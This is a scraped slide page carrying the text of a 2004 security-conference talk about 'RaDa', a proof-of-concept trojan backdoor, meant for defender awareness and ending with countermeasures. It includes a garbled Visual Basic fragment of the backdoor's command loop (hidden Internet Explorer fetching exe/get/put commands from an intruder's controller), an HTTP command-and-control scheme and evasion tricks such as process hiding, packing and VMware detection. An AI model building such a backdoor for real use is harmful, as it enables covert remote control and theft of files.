Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiConferencias FIST
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security ForumConferencias FIST
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes WirelessConferencias FIST
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la ConcienciaciónConferencias FIST
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloConferencias FIST
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseConferencias FIST
 
IDS with Artificial Intelligence
IDS with Artificial IntelligenceIDS with Artificial Intelligence
IDS with Artificial IntelligenceConferencias FIST
 

Mais de Conferencias FIST (20)

Seguridad en Open Solaris
Seguridad en Open SolarisSeguridad en Open Solaris
Seguridad en Open Solaris
 
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
 
SAP Security
SAP SecuritySAP Security
SAP Security
 
Que es Seguridad
Que es SeguridadQue es Seguridad
Que es Seguridad
 
Network Access Protection
Network Access ProtectionNetwork Access Protection
Network Access Protection
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security Forum
 
Criptografia Cuántica
Criptografia CuánticaCriptografia Cuántica
Criptografia Cuántica
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes Wireless
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la Concienciación
 
PKI Interoperability
PKI InteroperabilityPKI Interoperability
PKI Interoperability
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
 
Security Maturity Model
Security Maturity ModelSecurity Maturity Model
Security Maturity Model
 
IDS with Artificial Intelligence
IDS with Artificial IntelligenceIDS with Artificial Intelligence
IDS with Artificial Intelligence
 
Continuidad de Negocio
Continuidad de NegocioContinuidad de Negocio
Continuidad de Negocio
 
Esteganografia
EsteganografiaEsteganografia
Esteganografia
 

Último

Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 

Malware RADA

  • 1. RaDa: a “new” trojan backdoor Jorge Ortiz & Raúl Siles jorge.ortiz@hp.com raul.siles@hp.com FIST Conference Octubre/Madrid 2004 RaDa: a “new” trojan backdoor 1
  • 2. Agenda • Introduction • Healthy Environment • Remote Control (RaDa Demo) • One step beyond • Getting it in • Countermeasures RaDa: a “new” trojan backdoor 2
  • 3. Intro • Awareness on trojans for remote control & protection measures. • Most concepts are based in Setiri (R.Temmingh & H.Meer. BH 2002) • Implemented by Raul Siles, David Perez & Jorge Ortiz • Honeynet Project SOTM in September (Thanks Lance and Ed!) RaDa: a “new” trojan backdoor 3
  • 4. A healthy environment • You have done a pretty good job: – Policy & procedures – Firewall (ingress and egress filters) – IDS – Secure configurations – AV and Personal Firewalls • But problems appear… RaDa: a “new” trojan backdoor 4
  • 5. A healthy environment Internet Router Proxy Firewall IDS Secure system RaDa: a “new” trojan backdoor 5
  • 6. Remote Control • Let’s think for a minute that the intruder has been able to install a program. • We shall cover this later. RaDa: a “new” trojan backdoor 6
  • 7. Remote Control: implementation • RaDa: – Very easy to do – A lot of Cut&Paste code (Google knows how to do it!) – Visual Basic, Perl… – Using the IE of the system – HTTP communications RaDa: a “new” trojan backdoor 7
  • 8. RaDa: implementation Sub RaDa_Run() ' Load commands file ' Loop through the commands Set oExplorer = ' (Input fields in the first Form) CreateObject("InternetExplore For Each Element In r.Application") oExplorer.Document.Forms(0).Elements oExplorer.Visible = 0 sCommandsURL = sServerURL & Select Case Element.Name "/" & sCommandsFile Case "exe" oExplorer.Navigate sCommandsURL vRetValue = CommandExe(Element.Value) Case "get“ vRetValue = CommandGet(Element.Value) Case "put“ ' Close Internet Explorer and vRetValue = CommandPut(Element.Value) release the object variable Case Else "oExplorer" 'Ignore unknown command oExplorer.application.Quit End Select Set oExplorer = Nothing Next Element End Sub RaDa: a “new” trojan backdoor 8
  • 9. RaDa: How It Works 1. Intruder publishes order 2. RaDa opens invisible IE Intruder Controller 3. IE sends GET to Ctrler 4. Ctrler sends command back to RaDa HTTP/HTTPS 5. RaDa execs command & sends response with POST 6. Intruder retrieves results from Ctrler RaDa: a “new” trojan backdoor 9
  • 10. Demo RaDa: Command Exec 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“exe” value=“…”> 3. Exec command with Cmd.exe RaDa: a “new” trojan backdoor 10
  • 11. Demo RaDa: File Download 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“get” value=“…”> 3. Download file from Ctrler with POST. 4. UUdecode and save it RaDa: a “new” trojan backdoor 11
  • 12. Demo RaDa: Screen Capture 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“screenshot” value=“…”> 3. Capture screen with selected name RaDa: a “new” trojan backdoor 12
  • 13. Demo RaDa: File Upload 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“put” value=“…”> 3. Send back contents with POST RaDa: a “new” trojan backdoor 13
  • 14. Demo RaDa: hiding techniques • No application in Task Manager • Process name • Packed • HTTP through IE using HTML • Misleading info • VMWare detection RaDa: a “new” trojan backdoor 14
  • 15. One Step Beyond • Strong authentication of commands (GPG) • Blog/Wiki • Multiagent management Console • Other channels (mail, dns, ping, ftp) RaDa: a “new” trojan backdoor 15
  • 16. Getting it in • Zero day exploit • Ask for help: – Mail attachment – Download – Social engineering • Insider RaDa: a “new” trojan backdoor 16
  • 17. Countermeasures • User awareness • Baselines (processes, memory…) • Restrict web access • Update AV signatures frequently. • Signed Executables • Behavioral vs. Signature analysis RaDa: a “new” trojan backdoor 17
  • 18. Scan of the Month • Goal: – Improve the Windows reverse engineering malware state of the art • Honeynet Project: – http://www.honeynet.org/scans/ RaDa: a “new” trojan backdoor 18
  • 19. That’s all folks • Thank you! • Any questions? FIST Conference Octubre/Madrid 2004 RaDa: a “new” trojan backdoor 19
  • 20. Attribution-NonCommercial- NoDerivs 2.0 You are free: to copy, distribute, display, and perform the work Under the following conditions: Attribution. You must give the original author credit. Noncommercial. You may not use this work for commercial purposes. No Derivative Works. You may not alter, transform, or build upon this work. For any reuse or distribution, you must make clear to others the license terms of this work. Any of these conditions can be waived if you get permission from the author. Your fair use and other rights are in no way affected by the above. This is a human-readable summary of the http://creativecommons.org/licenses/by-nc- nd/2.0/. RaDa: a “new” trojan backdoor 20